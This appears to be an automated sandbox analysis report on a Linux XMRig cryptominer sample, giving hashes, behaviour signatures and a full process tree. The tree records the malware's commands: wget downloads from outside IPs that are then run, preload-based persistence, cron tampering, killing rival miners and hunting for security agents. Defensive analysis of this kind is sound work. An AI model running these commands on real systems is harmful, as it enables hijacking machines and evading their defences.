xmrig_linux | eecd1655817b07b4dcf843951be0b9e642c119eadd62bc118bb1fd82aa51aa1c

Analysis

max time kernel
56s
max time network
131s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240226-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240226-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
20-03-2024 08:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

adxintrin_b
Size

241KB
MD5

0e51f9a53fb48add6d175fb559d0bad4
SHA1

0eb71ce8dd1e51da43daf4489a9dc8073e37d62c
SHA256

eecd1655817b07b4dcf843951be0b9e642c119eadd62bc118bb1fd82aa51aa1c
SHA512

91276db9ac0517dad59cccb5608107fb95f55ca2e402b8d8ef91096a3f95c8322ba2fd5938b8b83b9f8d7a72d668298739bd494061073862cdeb11e4f6724190
SSDEEP

3072:Joc9NUyVPo4WTLVCZ+5YygA9+HNqITq0HVOedH0O2l9+hoAlUhPu+:ic9XVPo4WTLVCZ+5YJRtlUhPu+

Score

10^/10

xmrig_linux miner persistence

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux

Modifies the dynamic linker configuration file 1 TTPs 1 IoCs

Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.

persistence

Hijack Execution Flow

T1574

description	ioc
File opened for modification	/etc/ld.so.preload

Attempts to change immutable files 36 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
1982	chattr
2026	rm
2026	rm
2026	rm
2029	rm
2020	find
2029	rm
2029	rm
2030	rm
2037	find
2022	rm
2022	rm
2025	rm
2025	rm
2029	rm
2098	chattr
2030	rm
2022	rm
2025	rm
2026	rm
2026	rm
2029	rm
1984	chattr
2022	rm
2030	rm
2030	rm
2025	rm
2026	rm
2022	rm
2025	rm
2029	rm
2030	rm
2022	rm
2025	rm
2030	rm
2099	chattr

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 64 IoCs

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/179/status	ps
File opened for reading	/proc/173/status	pkill
File opened for reading	/proc/1180/status	ps
File opened for reading	/proc/5/cmdline	ps
File opened for reading	/proc/30/status	pkill
File opened for reading	/proc/85/status	ps
File opened for reading	/proc/456/stat	ps
File opened for reading	/proc/9/cmdline	ps
File opened for reading	/proc/170/status	pkill
File opened for reading	/proc/8/stat	ps
File opened for reading	/proc/612/cmdline	ps
File opened for reading	/proc/1359/cmdline	ps
File opened for reading	/proc/1057/status	ps
File opened for reading	/proc/422/stat	ps
File opened for reading	/proc/456/stat	ps
File opened for reading	/proc/20/stat	ps
File opened for reading	/proc/1184/status	pkill
File opened for reading	/proc/672/cmdline	ps
File opened for reading	/proc/1237/cmdline	ps
File opened for reading	/proc/1578/status	ps
File opened for reading	/proc/1198/cmdline	ps
File opened for reading	/proc/454/cmdline	ps
File opened for reading	/proc/1208/cmdline	pkill
File opened for reading	/proc/1630/stat	ps
File opened for reading	/proc/978/stat	ps
File opened for reading	/proc/1169/status	ps
File opened for reading	/proc/1375/status	ps
File opened for reading	/proc/1091/cmdline	ps
File opened for reading	/proc/24/status	pkill
File opened for reading	/proc/483/status	ps
File opened for reading	/proc/8/stat	ps
File opened for reading	/proc/79/stat	ps
File opened for reading	/proc/670/stat	ps
File opened for reading	/proc/1147/cmdline	ps
File opened for reading	/proc/165/cmdline	ps
File opened for reading	/proc/28/stat	ps
File opened for reading	/proc/728/status	pkill
File opened for reading	/proc/672/stat	ps
File opened for reading	/proc/13/status	pkill
File opened for reading	/proc/35/status	ps
File opened for reading	/proc/1310/status	ps
File opened for reading	/proc/1275/status	pkill
File opened for reading	/proc/495/cmdline	ps
File opened for reading	/proc/13/cmdline	ps
File opened for reading	/proc/1671/stat	ps
File opened for reading	/proc/274/cmdline	pkill
File opened for reading	/proc/208/stat	ps
File opened for reading	/proc/612/cmdline	ps
File opened for reading	/proc/1264/cmdline	pkill
File opened for reading	/proc/339/cmdline	ps
File opened for reading	/proc/264/status	pkill
File opened for reading	/proc/1180/status	ps
File opened for reading	/proc/1151/cmdline	ps
File opened for reading	/proc/1209/cmdline	ps
File opened for reading	/proc/1102/cmdline	ps
File opened for reading	/proc/662/status	ps
File opened for reading	/proc/1209/status	ps
File opened for reading	/proc/17/stat	ps
File opened for reading	/proc/1028/status	ps
File opened for reading	/proc/880/status	pkill
File opened for reading	/proc/1169/cmdline	ps
File opened for reading	/proc/428/cmdline	pkill
File opened for reading	/proc/670/cmdline	ps
File opened for reading	/proc/18/stat	ps

Writes file to tmp directory 7 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/sh-thd.MjtGzf	Process not Found
File opened for modification	/tmp/tmp.file	wget
File opened for modification	/tmp/tmp.file	wget
File opened for modification	/tmp/sh-thd.gQQoZn	Process not Found
File opened for modification	/tmp/tmp.file	wget
File opened for modification	/tmp/sh-thd.IrXddW	Process not Found
File opened for modification	/tmp/tmp.file	wget

/tmp/adxintrin_b
/tmp/adxintrin_b
1⤵
PID:1578
- /sbin/sysctl
  sysctl "kernel.pid_max=4194304"
  2⤵
  PID:1579
- /bin/chmod
  chmod 666 /dev/null
  2⤵
  PID:1580
- /bin/chmod
  chmod 755 "/etc/bin/*"
  2⤵
  PID:1581
- /usr/bin/basename
  basename /tmp/adxintrin_b
  2⤵
  PID:1585
- /bin/grep
  grep -a xfit /root/.bashrc
  2⤵
  PID:1586
- /bin/mkdir
  mkdir /tmp
  2⤵
  PID:1587
- /bin/chmod
  chmod 755 /etc/ld.so.preload
  2⤵
  PID:1588
- /bin/grep
  grep -v defunct
  2⤵
  PID:1592
- /usr/bin/awk
  awk "{ print \$2 }"
  2⤵
  PID:1593
- /bin/grep
  grep -v grep
  2⤵
  PID:1591
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:1594
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:1595
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:1595
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:1595
- - /usr/bin/kill
    kill -9
    3⤵
    PID:1595
- - /sbin/kill
    kill -9
    3⤵
    PID:1595
- - /bin/kill
    kill -9
    3⤵
    - Reads CPU attributes
    PID:1595
- /bin/grep
  grep spend-secret-key
  2⤵
  PID:1590
- /bin/ps
  ps -eaf
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1589
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:1601
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:1602
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:1602
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:1602
- - /usr/bin/kill
    kill -9
    3⤵
    PID:1602
- - /sbin/kill
    kill -9
    3⤵
    PID:1602
- - /bin/kill
    kill -9
    3⤵
    - Reads CPU attributes
    PID:1602
- /usr/bin/awk
  awk "{ print \$2 }"
  2⤵
  PID:1600
- /bin/grep
  grep -v defunct
  2⤵
  PID:1599
- /bin/grep
  grep -v grep
  2⤵
  PID:1598
- /bin/grep
  grep -- "\\-\\-algo"
  2⤵
  PID:1597
- /bin/ps
  ps -eaf
  2⤵
  PID:1596
- /usr/bin/awk
  awk "{ print \$2 }"
  2⤵
  PID:1607
- /bin/grep
  grep -v defunct
  2⤵
  PID:1606
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:1608
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:1609
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:1609
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:1609
- - /usr/bin/kill
    kill -9
    3⤵
    PID:1609
- - /sbin/kill
    kill -9
    3⤵
    PID:1609
- - /bin/kill
    kill -9
    3⤵
    - Reads CPU attributes
    PID:1609
- /bin/grep
  grep -v grep
  2⤵
  PID:1605
- /bin/grep
  grep -- "\\-\\-url"
  2⤵
  PID:1604
- /bin/ps
  ps -eaf
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1603
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:1615
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:1616
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:1616
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:1616
- - /usr/bin/kill
    kill -9
    3⤵
    PID:1616
- - /sbin/kill
    kill -9
    3⤵
    PID:1616
- - /bin/kill
    kill -9
    3⤵
    PID:1616
- /usr/bin/awk
  awk "{ print \$2 }"
  2⤵
  PID:1614
- /bin/grep
  grep -v defunct
  2⤵
  PID:1613
- /bin/grep
  grep -v grep
  2⤵
  PID:1612
- /bin/grep
  grep -- "\\-\\-donate-level"
  2⤵
  PID:1611
- /bin/ps
  ps -eaf
  2⤵
  - Reads runtime system information
  PID:1610
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:1622
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:1623
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:1623
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:1623
- - /usr/bin/kill
    kill -9
    3⤵
    PID:1623
- - /sbin/kill
    kill -9
    3⤵
    PID:1623
- - /bin/kill
    kill -9
    3⤵
    PID:1623
- /usr/bin/awk
  awk "{ print \$2 }"
  2⤵
  PID:1621
- /bin/grep
  grep -v defunct
  2⤵
  PID:1620
- /bin/grep
  grep -v grep
  2⤵
  PID:1619
- /bin/grep
  grep minerd
  2⤵
  PID:1618
- /bin/ps
  ps -eaf
  2⤵
  PID:1617
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:1629
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:1633
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:1633
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:1633
- - /usr/bin/kill
    kill -9
    3⤵
    PID:1633
- - /sbin/kill
    kill -9
    3⤵
    PID:1633
- - /bin/kill
    kill -9
    3⤵
    PID:1633
- /usr/bin/awk
  awk "{ print \$2 }"
  2⤵
  PID:1628
- /bin/grep
  grep -v defunct
  2⤵
  PID:1627
- /bin/grep
  grep -v grep
  2⤵
  PID:1626
- /bin/grep
  grep xmr
  2⤵
  PID:1625
- /bin/ps
  ps -eaf
  2⤵
  - Reads runtime system information
  PID:1624
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:1639
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:1640
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:1640
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:1640
- - /usr/bin/kill
    kill -9
    3⤵
    PID:1640
- - /sbin/kill
    kill -9
    3⤵
    PID:1640
- - /bin/kill
    kill -9
    3⤵
    - Reads CPU attributes
    PID:1640
- /bin/grep
  grep -v defunct
  2⤵
  PID:1637
- /usr/bin/awk
  awk "{ print \$2 }"
  2⤵
  PID:1638
- /bin/grep
  grep -v grep
  2⤵
  PID:1636
- /bin/grep
  grep cryptonight
  2⤵
  PID:1635
- /bin/ps
  ps -eaf
  2⤵
  - Reads runtime system information
  PID:1634
- /usr/bin/pkill
  pkill -9 xmrig
  2⤵
  - Reads CPU attributes
  PID:1641
- /usr/bin/pkill
  pkill -f xmrig
  2⤵
  PID:1642
- /usr/bin/pkill
  pkill -f Loopback
  2⤵
  - Reads runtime system information
  PID:1643
- /usr/bin/pkill
  pkill -f apaceha
  2⤵
  - Reads CPU attributes
  PID:1644
- /usr/bin/pkill
  pkill -f cryptonight
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1645
- /usr/bin/pkill
  pkill -f stratum
  2⤵
  - Reads CPU attributes
  PID:1646
- /usr/bin/pkill
  pkill -f minerd
  2⤵
  PID:1647
- /usr/bin/pkill
  pkill -9 log-rotate
  2⤵
  PID:1648
- /usr/bin/pkill
  pkill -9 warmun
  2⤵
  PID:1649
- /usr/bin/pkill
  pkill -9 kinettd
  2⤵
  - Reads CPU attributes
  PID:1650
- /usr/bin/find
  find /root -maxdepth 2 -name "*kill*"
  2⤵
  PID:1651
- /usr/bin/chattr
  chattr -aui /etc/cron.daily/xbash
  2⤵
  PID:1652
- /usr/bin/chattr
  chattr -aui /etc/cron.hourly/xbash
  2⤵
  PID:1653
- /bin/grep
  grep top.sh
  2⤵
  PID:1656
- /bin/grep
  grep -v grep
  2⤵
  PID:1655
- /bin/ps
  ps cax
  2⤵
  - Reads CPU attributes
  PID:1654
- /bin/grep
  grep ds_agent
  2⤵
  PID:1659
- /bin/grep
  grep -v grep
  2⤵
  PID:1658
- /bin/ps
  ps cax
  2⤵
  PID:1657
- /bin/grep
  grep vm-agent
  2⤵
  PID:1662
- /bin/grep
  grep -v grep
  2⤵
  PID:1661
- /bin/ps
  ps cax
  2⤵
  PID:1660
- /bin/grep
  grep mysqll
  2⤵
  PID:1665
- /bin/grep
  grep -v grep
  2⤵
  PID:1664
- /bin/ps
  ps cax
  2⤵
  PID:1663
- /bin/grep
  grep linux_client
  2⤵
  PID:1668
- /bin/grep
  grep -v grep
  2⤵
  PID:1667
- /bin/ps
  ps cax
  2⤵
  - Reads CPU attributes
  PID:1666
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:1673
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:1674
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:1674
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:1674
- - /usr/bin/kill
    kill -9
    3⤵
    PID:1674
- - /sbin/kill
    kill -9
    3⤵
    PID:1674
- - /bin/kill
    kill -9
    3⤵
    - Reads CPU attributes
    PID:1674
- /usr/bin/awk
  awk "{ print \$2 }"
  2⤵
  PID:1672
- /bin/grep
  grep -v grep
  2⤵
  PID:1671
- /bin/grep
  grep linux_client
  2⤵
  PID:1670
- /bin/ps
  ps -eaf
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1669
- /bin/grep
  grep edr_agent
  2⤵
  PID:1677
- /bin/grep
  grep -v grep
  2⤵
  PID:1676
- /bin/ps
  ps cax
  2⤵
  PID:1675
- /bin/grep
  grep edr_agent
  2⤵
  PID:1680
- /bin/grep
  grep -v grep
  2⤵
  PID:1679
- /bin/ps
  ps -eo cmd
  2⤵
  PID:1678
- /bin/grep
  grep xs_agent
  2⤵
  PID:1683
- /bin/grep
  grep -v grep
  2⤵
  PID:1682
- /bin/ps
  ps -eo cmd
  2⤵
  - Reads runtime system information
  PID:1681
- /bin/grep
  grep cwpp_agent
  2⤵
  PID:1686
- /bin/grep
  grep -v grep
  2⤵
  PID:1685
- /bin/ps
  ps -eo cmd
  2⤵
  - Reads CPU attributes
  PID:1684
- /bin/grep
  grep ds_agent
  2⤵
  PID:1689
- /bin/grep
  grep -v grep
  2⤵
  PID:1688
- /bin/ps
  ps -eo cmd
  2⤵
  - Reads CPU attributes
  PID:1687
- /bin/grep
  grep guard_client
  2⤵
  PID:1692
- /bin/grep
  grep -v grep
  2⤵
  PID:1691
- /bin/ps
  ps cax
  2⤵
  - Reads CPU attributes
  PID:1690
- /bin/grep
  grep qaxsafe
  2⤵
  PID:1695
- /bin/grep
  grep -v grep
  2⤵
  PID:1694
- /bin/ps
  ps -eo cmd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1693
- /bin/grep
  grep clamav
  2⤵
  PID:1698
- /bin/grep
  grep -v grep
  2⤵
  PID:1697
- /bin/ps
  ps -eo cmd
  2⤵
  PID:1696
- /bin/grep
  grep 360safed
  2⤵
  PID:1701
- /bin/grep
  grep -v grep
  2⤵
  PID:1700
- /bin/ps
  ps -eo cmd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1699
- /bin/grep
  grep eppagent
  2⤵
  PID:1704
- /bin/grep
  grep -v grep
  2⤵
  PID:1703
- /bin/ps
  ps -eo cmd
  2⤵
  - Reads runtime system information
  PID:1702
- /bin/rm
  rm -rf "/home/*/.local/share/Trash/*/**"
  2⤵
  PID:1705
- /bin/rm
  rm -rf "/root/.local/share/Trash/*/**"
  2⤵
  PID:1706
- /bin/rm
  rm -rf /usr/share/man/cs /usr/share/man/da /usr/share/man/de /usr/share/man/es /usr/share/man/fi /usr/share/man/fr /usr/share/man/hu /usr/share/man/id /usr/share/man/it /usr/share/man/ja /usr/share/man/ko /usr/share/man/nl /usr/share/man/pl /usr/share/man/pt /usr/share/man/ru /usr/share/man/sl /usr/share/man/sr /usr/share/man/sv /usr/share/man/tr
  2⤵
  PID:1707
- /bin/rm
  rm -rf /usr/share/man/pt_BR /usr/share/man/zh_CN /usr/share/man/zh_TW
  2⤵
  PID:1708
- /bin/rm
  rm -rf "/core.*"
  2⤵
  PID:1709
- /bin/rm
  rm -fr /root/install
  2⤵
  PID:1710
- /bin/rm
  rm -fr /boot/xmrig
  2⤵
  PID:1711
- /bin/rm
  rm -fr /root/xmrig
  2⤵
  PID:1712
- /bin/rm
  rm -fr /kinettd
  2⤵
  PID:1713
- /usr/bin/pkill
  pkill -9 abrtd
  2⤵
  - Reads CPU attributes
  PID:1714
- /bin/cp
  cp -f /etc/cron.daily/xbash /etc/cron.hourly/anacron
  2⤵
  PID:1715
- /bin/cp
  cp -f /etc/cron.daily/xbash /etc/cron.weekly/cron
  2⤵
  PID:1716
- /bin/chmod
  chmod 755 /etc/cron.hourly/anacron
  2⤵
  PID:1717
- /bin/chmod
  chmod 755 /etc/cron.weekly/cron
  2⤵
  PID:1718
- /usr/bin/arch
  arch
  2⤵
  PID:1719
- /usr/bin/arch
  arch
  2⤵
  PID:1720
- /usr/bin/arch
  arch
  2⤵
  PID:1721
- /usr/bin/basename
  basename /tmp/adxintrin_b
  2⤵
  PID:1725
- /bin/cat
  cat /root/gcclib/ip.txt
  2⤵
  PID:1786

/usr/bin/dirname
dirname /tmp/adxintrin_b
1⤵
PID:1584

/usr/bin/dirname
dirname /tmp/adxintrin_b
1⤵
PID:1724

/bin/sed
sed -r "s/ //g"
1⤵
PID:1732

/bin/sed
sed -r "s#(http?://)?([^/]+)(.*)#\\15.133.65.53\\3#"
1⤵
PID:1735

/bin/grep
grep -q -- --tries
1⤵
PID:1737

/usr/bin/wget
wget -h
1⤵
PID:1736

/usr/bin/wget
wget "--timeout=10" "--tries=3" -O /tmp/tmp.file http://5.133.65.53/soft/linux/cronman
1⤵
- Writes file to tmp directory
PID:1738

/bin/cat
cat /tmp/tmp.file
1⤵
PID:1758

/bin/mv
mv -f /tmp/tmp.file /tmp/.adxintrin_b
1⤵
PID:1759

/bin/chmod
chmod 755 /tmp/.adxintrin_b
1⤵
PID:1760

/bin/sed
sed -r "s/ //g"
1⤵
PID:1766

/bin/sed
sed -r "s#(http?://)?([^/]+)(.*)#\\15.133.65.53\\3#"
1⤵
PID:1769

/bin/grep
grep -q -- --tries
1⤵
PID:1771

/usr/bin/wget
wget -h
1⤵
PID:1770

/usr/bin/wget
wget "--timeout=10" "--tries=3" -O /tmp/tmp.file http://5.133.65.53/soft/linux/xbash
1⤵
- Writes file to tmp directory
PID:1772

/bin/cat
cat /tmp/tmp.file
1⤵
PID:1774

/bin/sed
sed -r "s/ //g"
1⤵
PID:1777

/bin/sed
sed -r "s#(http?://)?([^/]+)(.*)#\\145.142.212.30\\3#"
1⤵
PID:1780

/bin/grep
grep -q -- --tries
1⤵
PID:1782

/usr/bin/wget
wget -h
1⤵
PID:1781

/usr/bin/wget
wget "--timeout=10" "--tries=3" -O /tmp/tmp.file http://45.142.212.30/soft/linux/xbash
1⤵
- Writes file to tmp directory
PID:1783

/bin/cat
cat /tmp/tmp.file
1⤵
PID:1785

/tmp/.adxintrin_b
/tmp/.adxintrin_b
1⤵
PID:1578
- /sbin/sysctl
  sysctl "kernel.pid_max=4194304"
  2⤵
  PID:1787
- /bin/chmod
  chmod 666 /dev/null
  2⤵
  PID:1788
- /bin/chmod
  chmod 755 "/etc/bin/*"
  2⤵
  PID:1789
- /usr/bin/basename
  basename /tmp/.adxintrin_b
  2⤵
  PID:1793
- /bin/grep
  grep -a xfit /root/.bashrc
  2⤵
  PID:1794
- /bin/mkdir
  mkdir /tmp
  2⤵
  PID:1795
- /bin/chmod
  chmod 755 /etc/ld.so.preload
  2⤵
  PID:1796
- /bin/grep
  grep -v defunct
  2⤵
  PID:1800
- /usr/bin/awk
  awk "{ print \$2 }"
  2⤵
  PID:1801
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:1802
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:1803
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:1803
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:1803
- - /usr/bin/kill
    kill -9
    3⤵
    PID:1803
- - /sbin/kill
    kill -9
    3⤵
    PID:1803
- - /bin/kill
    kill -9
    3⤵
    - Reads CPU attributes
    PID:1803
- /bin/grep
  grep -v grep
  2⤵
  PID:1799
- /bin/grep
  grep spend-secret-key
  2⤵
  PID:1798
- /bin/ps
  ps -eaf
  2⤵
  - Reads runtime system information
  PID:1797
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:1809
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:1810
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:1810
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:1810
- - /usr/bin/kill
    kill -9
    3⤵
    PID:1810
- - /sbin/kill
    kill -9
    3⤵
    PID:1810
- - /bin/kill
    kill -9
    3⤵
    - Reads CPU attributes
    PID:1810
- /usr/bin/awk
  awk "{ print \$2 }"
  2⤵
  PID:1808
- /bin/grep
  grep -v defunct
  2⤵
  PID:1807
- /bin/grep
  grep -v grep
  2⤵
  PID:1806
- /bin/grep
  grep -- "\\-\\-algo"
  2⤵
  PID:1805
- /bin/ps
  ps -eaf
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1804
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:1816
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:1817
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:1817
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:1817
- - /usr/bin/kill
    kill -9
    3⤵
    PID:1817
- - /sbin/kill
    kill -9
    3⤵
    PID:1817
- - /bin/kill
    kill -9
    3⤵
    PID:1817
- /usr/bin/awk
  awk "{ print \$2 }"
  2⤵
  PID:1815
- /bin/grep
  grep -v defunct
  2⤵
  PID:1814
- /bin/grep
  grep -v grep
  2⤵
  PID:1813
- /bin/grep
  grep -- "\\-\\-url"
  2⤵
  PID:1812
- /bin/ps
  ps -eaf
  2⤵
  - Reads runtime system information
  PID:1811
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:1823
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:1824
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:1824
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:1824
- - /usr/bin/kill
    kill -9
    3⤵
    PID:1824
- - /sbin/kill
    kill -9
    3⤵
    PID:1824
- - /bin/kill
    kill -9
    3⤵
    - Reads CPU attributes
    PID:1824
- /usr/bin/awk
  awk "{ print \$2 }"
  2⤵
  PID:1822
- /bin/grep
  grep -v defunct
  2⤵
  PID:1821
- /bin/grep
  grep -v grep
  2⤵
  PID:1820
- /bin/grep
  grep -- "\\-\\-donate-level"
  2⤵
  PID:1819
- /bin/ps
  ps -eaf
  2⤵
  PID:1818
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:1830
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:1831
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:1831
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:1831
- - /usr/bin/kill
    kill -9
    3⤵
    PID:1831
- - /sbin/kill
    kill -9
    3⤵
    PID:1831
- - /bin/kill
    kill -9
    3⤵
    PID:1831
- /usr/bin/awk
  awk "{ print \$2 }"
  2⤵
  PID:1829
- /bin/grep
  grep -v defunct
  2⤵
  PID:1828
- /bin/grep
  grep -v grep
  2⤵
  PID:1827
- /bin/grep
  grep minerd
  2⤵
  PID:1826
- /bin/ps
  ps -eaf
  2⤵
  - Reads CPU attributes
  PID:1825
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:1837
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:1838
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:1838
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:1838
- - /usr/bin/kill
    kill -9
    3⤵
    PID:1838
- - /sbin/kill
    kill -9
    3⤵
    PID:1838
- - /bin/kill
    kill -9
    3⤵
    - Reads CPU attributes
    PID:1838
- /usr/bin/awk
  awk "{ print \$2 }"
  2⤵
  PID:1836
- /bin/grep
  grep -v defunct
  2⤵
  PID:1835
- /bin/grep
  grep -v grep
  2⤵
  PID:1834
- /bin/grep
  grep xmr
  2⤵
  PID:1833
- /bin/ps
  ps -eaf
  2⤵
  PID:1832
- /usr/bin/awk
  awk "{ print \$2 }"
  2⤵
  PID:1843
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:1844
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:1845
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:1845
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:1845
- - /usr/bin/kill
    kill -9
    3⤵
    PID:1845
- - /sbin/kill
    kill -9
    3⤵
    PID:1845
- - /bin/kill
    kill -9
    3⤵
    - Reads CPU attributes
    PID:1845
- /bin/grep
  grep -v defunct
  2⤵
  PID:1842
- /bin/grep
  grep -v grep
  2⤵
  PID:1841
- /bin/grep
  grep cryptonight
  2⤵
  PID:1840
- /bin/ps
  ps -eaf
  2⤵
  PID:1839
- /usr/bin/pkill
  pkill -9 xmrig
  2⤵
  - Reads CPU attributes
  PID:1846
- /usr/bin/pkill
  pkill -f xmrig
  2⤵
  - Reads runtime system information
  PID:1847
- /usr/bin/pkill
  pkill -f Loopback
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1848
- /usr/bin/pkill
  pkill -f apaceha
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1849
- /usr/bin/pkill
  pkill -f cryptonight
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1850
- /usr/bin/pkill
  pkill -f stratum
  2⤵
  - Reads CPU attributes
  PID:1851
